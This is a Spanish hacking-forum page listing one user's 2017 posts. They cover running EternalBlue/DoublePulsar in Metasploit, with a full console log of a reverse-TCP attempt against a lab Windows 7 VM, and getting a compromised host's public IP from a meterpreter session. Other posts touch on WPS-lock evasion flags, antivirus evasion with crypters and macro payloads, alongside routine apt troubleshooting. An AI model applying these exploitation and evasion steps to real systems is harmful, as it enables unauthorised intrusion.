Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - redferne

Páginas 1 2 3 4 ... 13
#21
Dudas y pedidos generales / Alguien tiene un FilePumper multi-plataforma.
Julio 17, 2017, 11:47:30 AM
Sabéis de algún filepumper limpio?
Si hay para Linux y Windows mejor.
Para Linux he visto el redpois0n, lo ha probado alguien?
Pd:he mirado en la biblioteca de malware pero no he visto nada...
#22
Dudas y pedidos generales / Re:[SOLUCIONADO] sesion meterpreter abierta como saber ip publica?
Junio 29, 2017, 03:15:33 PM
Haber, no lo sabía, lo he ido mirando, sino, no pregunto.....El post lleva varios días abierto con lo cual es de suponer que he leído de bastantes sitios y he ido recopilando info y probando, y lo que funciona lo he posteado para los demás foreros.....
Aún así no comprendo lo que quieres decir con que tú comando funciona en meterpteter ejecutandolo como sentencia local?
Me podrías aclarar cómo se hace o remitirme a algún artículo?
#23
Dudas y pedidos generales / Re:sesion meterpreter abierta como saber ip publica?
Junio 29, 2017, 08:49:39 AM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Buenas tardes,

Si tenes una sesión de meterpreter activa significa que te conectaste a un ordenador que se encuentra en tu red local por ip local y no necesitas la publica........ o quizás estas conectado a un equipo remoto de dominio publico.... pero ya no importa.. porque? porque ya estas conectado.

En caso de que la necesites de todas formas puedes ejecutar un comando en la maquina.... Puedes utilizar:

Para linux:
dig +short You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login @resolver1.opendns.com

Para windows:
nslookup You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Que es lo que hace? simplemente una consulta de resolución de dns reversa. Recuerda que los dns tienen una ip, cuando tu consultas a una ip su nombre dns se resuelve, obtienes lo mismo pero simplemente al revés, sabrás la IP publica.

Saludos

gracias por tu ayuda, de todas maneras aunque este conectado me gusta saber la ip publica......
tu comando no va en la sesion de meterpreter que es lo que busco...si va en linux en la consola asi que servir me sirve...aun asi buscaba saberlo en la consola con la sesion abierta y tengo varias alternativas...pongo todas para que quede la info, incluida en meterpreter:

-para ver en consola la ip publica en linux
Código: bash

curl ifconfig.me    (sino esta curl instalado "apt-get install curl" )
curl ifconfig.me/ip (solo sale la ip)
curl ifconfig.me/all   ( da mas info....mirar mas comandos en la pagina "http://ifconfig.me/"   )
curl ip.appspot.com
wget -qO- ifconfig.me/ip   ( si no tenemos o queremos instalar curl )


-funciona en windows y linux (en la sesion de meterpreter abierta no pero en una meterpreter-shell de windows si ) :

Código: dos
nslookup -querytype=TXT o-o.myaddr.1.google.com ns1.google.com
nslookup myip.opendns.com resolver1.opendns.com



-solucion chapucera para windows:
Código: dos

start www.ifconfig.me/ip  se le abre al ordenador una ventana del navegador con la ip...podemos variar la pagina...)  
start www.vermiip.es
start http://whatismyipaddress.com/
#24
Dudas y pedidos generales / Re:Evadir bloqueo WPS Router Vodafone.
Junio 28, 2017, 09:52:13 AM
Hoy día hay routers de mierdafone que al segundo pin que se intenta se bloquea por mucho tiempo, se puede usar lo que han comentado -d x=tiempo entre pines es de 0-5 seg
también. -r 1:70 
Siendo 1= número de pines
Siendo  70= al tiempo de espera para probar el siguiente pin si te parece que es mucho esperar es cierto es eterno......Es cuestión de probar a cuántos pines se bloquea y poner uno o dos menos.....Así que hoy día
fluxion-linset
#25
Dudas y pedidos generales / [SOLUCIONADO] sesion meterpreter abierta como saber ip publica?
Junio 28, 2017, 06:04:19 AM
saludos:
si tengo una sesion de meterpreter abierta se puede saber la ip publica de la maquina comprometida,como?
#26
Dudas y pedidos generales / Re:eternal blue reinicia ordenador
Junio 27, 2017, 03:47:26 PM
Ok gracias a todos
#27
Dudas y pedidos generales / Re:eternal blue reinicia ordenador
Junio 26, 2017, 09:11:41 AM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, ¿estás usando el exploit oficial de metasploit?
Uso el de elevenpath, es más estable el oficial?
Código: text
https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit


You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Es well known. De hecho en la docu oficial del modulo lo pone:

Código: text

On some systems, this module may cause system instability and crashes, such as a BSOD or a reboot. This may be more likely with some payloads.

Ya, por eso pregunto las experiencias que habéis tenido.....
#28
Dudas y pedidos generales / [SOLUCIONADO] Eternal Blue reinicia ordenador
Junio 26, 2017, 08:05:06 AM
saludos:
he estado trasteando con el exploit y en un w7 ultimate 32bits si injecto en el proceso "lsass.exe" la maquina objetivo se reinicia, si injecto en el "explorer.exe" no pasa.......y se abre la sesion sin problemas, pero sin privilegios de admin......le pasa a alguien mas.....?

en el video de "team whoami" le pasaba a veces con un w7 64bits (parece que es la version pro no estoy seguro)

el proceso "lsass.exe" esta corriendo en la maquina atacada ,parece que no, pero si le das a mostrar todos los procesos de todos los usuarios en el administrador de tareas . se ve que si esta corriendo.......

kali y w7 corriendo en vbox
#29
Dudas y pedidos generales / kali con cifrado persistencia y autodrestruccion como?
Junio 24, 2017, 05:27:58 AM
saludos
tengo kali en una microsd de 32gb con persistencia de todo el resto de la microsd....por lo cual ya se crear persistencia....pero ahora lo que quiero es crearla con persistencia,encriptar tanto kali como la perisistencia y añadirle nuke password.

he mirado y la verdad que lo que he encontrado la mayoria esta en ingles y es un poco lioso.....

alguien sabe donde hay informacion........aparte de esto:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Ahora un par de dudas:
si yo creo un liveusb persistente y encripto tanto kali como la persistencia con LUKS habria alguna manera de poder acceder a los datos sin conocer la clave ?
esto tambien vale para tecnicas forenses de recuperacion de datos......estilo foremost,recuva......?

si le aplico nuke password, como funcionaria? me explico, yo tengo arrancado kali, estoy haciendo lo que sea.......y puedo meter el nuke password ? o seria solo al iniciar el sistema en lugar de meter la pass normal, metes la nuke y las claves se "pierden" ?

#30
Dudas y pedidos generales / Re:error en apt al instalar paquetes
Junio 23, 2017, 08:24:39 AM
pongo la solucion por si a alguien le hace falta:
-arrancar con otro kernel
-pulsa control + H, par ver archivos y directorios ocultos navegar hasta
/var/lib/dpkg/updates/
Borrar todos los archivos existentes en ese directorio ( copia de respaldo por si acaso )

ejecuta en la terminal
Código: text

sudo su ( nos logeamos como admin)
dpkg --configure -a
apt-get install -f
apt-get update
apt-get upgrade
apt-get autoremove
apt-get clean

en mi caso yo luego borre el kernel nuevo ya que me daba problemas con la conexion de red, no reconocia mi tarjeta de red, asi que lo borre y luego actualize el grub
Código: text

sudo update-grub2

y por ahora todo bien...



#31
Dudas y pedidos generales / Re:error en apt al instalar paquetes
Junio 21, 2017, 05:45:55 PM
fallo mio no poner todo . por descontado que los comandos llevaban el sudo delante......

ahora me a dado el error de
initramfs
y no arranca....
he metido un live cd de ubuntu y he ejecutado
sudo fdisl -l
sudo fsck /dev/sda3   que es la particion de mi sistema xubuntu 14.04 lts

despues de acabar he reiniciado y he entrado en xubuntu y sigue sin poder actualizar.........he reiniciado y no reinicia me sale este error

Mount failed for selinuxfs on /sys/fs/selinux: no such file or directory

si pongo otra vez el live cd  de ubuntu accedo al disco sin problemas (dev/sda3) y veo y manipulo todos lo archivos......pero si arranco normalmente me sale el mensaje que he puesto, es mas me pone que el disco dev/sda3 no esta presente
#32
Dudas y pedidos generales / [SOLUCIONADO] error en apt al instalar paquetes
Junio 21, 2017, 12:56:33 PM
saludos
intento actualizar y
Código: text

apt-get update
E: No se pudo abrir el fichero de bloqueo «/var/lib/apt/lists/lock» - open (13: Permiso denegado)
E: No se pudo bloquear el directorio /var/lib/apt/lists/
E: No se pudo abrir el fichero de bloqueo «/var/lib/dpkg/lock» - open (13: Permiso denegado)
E: No se encontró un archivo de réplica «/var/lib/dpkg/»

apt-get upgrade
apt upgrade
E: No se pudo abrir el fichero de bloqueo «/var/lib/dpkg/lock» - open (13: Permiso denegado)
E: No se encontró un archivo de réplica «/var/lib/dpkg/»

otra vez me paso lo mismo y era algun paquete roto puse

Código: text
apt-get -f install
E: se interrumpió la ejecución de dpkg, debe ejecutar manualmente «sudo dpkg --configure -a» para corregir el problema

le meti
sudo dpkg --configure -a

Código: text

dpkg: error: al analizar el fichero '/var/lib/dpkg/updates/0007' cerca de la línea 0:
 nueva línea dentro del nombre del campo `/.'


#33
Dudas y pedidos generales / Re:[SOLUCIONADO] exploit eternal blue y carpeta deps
Junio 20, 2017, 06:35:50 PM
no se si abrir otro post..... pero como va de lo mismo.....
hago todo esto pero no funciona

Código: text

       =[ metasploit v4.14.22-dev                         ]
+ -- --=[ 1660 exploits - 947 auxiliary - 293 post        ]
+ -- --=[ 486 payloads - 40 encoders - 9 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf> use windows/smb/eternalblue_doublepulsar
msf exploit(eternalblue_doublepulsar) > set eternalbluepath /root/Desktop/eternalblue/deps/
eternalbluepath => /root/Desktop/eternalblue/deps/
msf exploit(eternalblue_doublepulsar) > set doublepulsarpath /root/Desktop/eternalblue/deps/
doublepulsarpath => /root/Desktop/eternalblue/deps/
msf exploit(eternalblue_doublepulsar) > set targetarchitecture x86
targetarchitecture => x86
msf exploit(eternalblue_doublepulsar) > set process inject wlms.exe
process => inject wlms.exe
msf exploit(eternalblue_doublepulsar) > set lhost 192.168.0.193
lhost => 192.168.0.193
msf exploit(eternalblue_doublepulsar) > set lport 8008
lport => 8008
msf exploit(eternalblue_doublepulsar) > set rhost 192.168.0.194
rhost => 192.168.0.194
msf exploit(eternalblue_doublepulsar) > set winepath /root/.wine/drive_c/
winepath => /root/.wine/drive_c/
msf exploit(eternalblue_doublepulsar) > exploit

[*] Started reverse TCP handler on 192.168.0.193:8008 
[*] 192.168.0.194:445 - Generating Eternalblue XML data
[*] 192.168.0.194:445 - Generating Doublepulsar XML data
[*] 192.168.0.194:445 - Generating payload DLL for Doublepulsar
[*] 192.168.0.194:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 192.168.0.194:445 - Launching Eternalblue...
[-] Error getting output back from Core; aborting...
[-] 192.168.0.194:445 - Are you sure it's vulnerable?
[*] 192.168.0.194:445 - Launching Doublepulsar...
[-] 192.168.0.194:445 - Oops, something was wrong!
[*] Exploit completed, but no session was created.
msf exploit(eternalblue_doublepulsar) >


por descontado que el puerto esta abierto a la ip 192.168.0.193

el w7 es ultimate 32bits y tanto kali como w7 corren en vbox en la mima red kali 2016.2
w7 ip 192.168.0.194
kali ip 192.168.0.193 con el puerto 8008 abierto en el router
#34
Dudas y pedidos generales / [SOLUCIONADO] exploit eternal blue y carpeta deps
Junio 20, 2017, 09:34:34 AM
saludos:
he descargado el exploit eternalblue_doblepulsar de github, lo he metido en esta ruta

/root/.msf4/modules/exploits/local/windows/eternalblue (esta es la carpeta descargada que la he renombrado a eternalblue no se si he hecho mal.....)

las carpetas "exploits local y windows" las he creado yo para llevar un poco de orden......el caso es que dentro de dicha carpeta esta tambien la carpeta
"deps" y mi pregunta es si esa es la ubicacion correcta ?
#35
Dudas y pedidos generales / Re:Instalación de kali linux junto a windows 7
Junio 18, 2017, 03:52:58 AM
El problema para instalar w7 con kali y que kali tenga separado el "/" del "home" que es lo ideal......Es que  w7 y kali juntos necesitan más particiones lógicas de las que admite un hdd.
Por lo cual primero se instala w7 por el problema que se conoce que si no se carga el arranque de linux....Y luego se crea una partición extendida en la cual se instalara kali con "/" y " home" separados
#36
Dudas y pedidos generales / Re:Ver rango IPv4 por país?
Junio 18, 2017, 03:42:43 AM
Ok gracias, por tu aportación es muy interesante y útil para mi  ;D
#37
Dudas y pedidos generales / [SOLUCIONADO] Ver rango IPv4 por país?
Junio 16, 2017, 04:17:56 PM
Hay algún sitio donde pongan los rangos de las ipsv4 por país?
He visto algunos pero no se si son muy actuales una entre otras
Código: text
https://www.countryipblocks.net/country_selection.php
#38
Dudas y pedidos generales / Re:evasion de firmas
Junio 14, 2017, 10:57:36 AM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Código: text
www.securitybydefault.com/2013/09/crypters-practicando-la-tecnica.html?m=1


Y mira vídeos, en Youtube tienes muchos
#39
Dudas y pedidos generales / script Ddosv5.sh para vbox?
Junio 05, 2017, 10:08:15 AM
Saludos
Alguien a probado ese script para instalar vbox en kali 2016.2 ?
La instalación me imagino que será en inglés.....Se puede luego cambiar el lenguaje de la guí de vbox?
Sería factible instalar vbox en una live microsd con 10mb de  velocidad de escritura ,lo digo por la velocidad
Código: text
github.com/FreelancePentester/ddos-script/commit/8053efdbf9ec0ea2344b0f05f4b5755c73da50f7?diff=split
#40
Dudas y pedidos generales / Re:Como insertar un paylod en un macro de excel.
Junio 03, 2017, 02:39:45 AM
Todo ok, gracias
Páginas 1 2 3 4 ... 13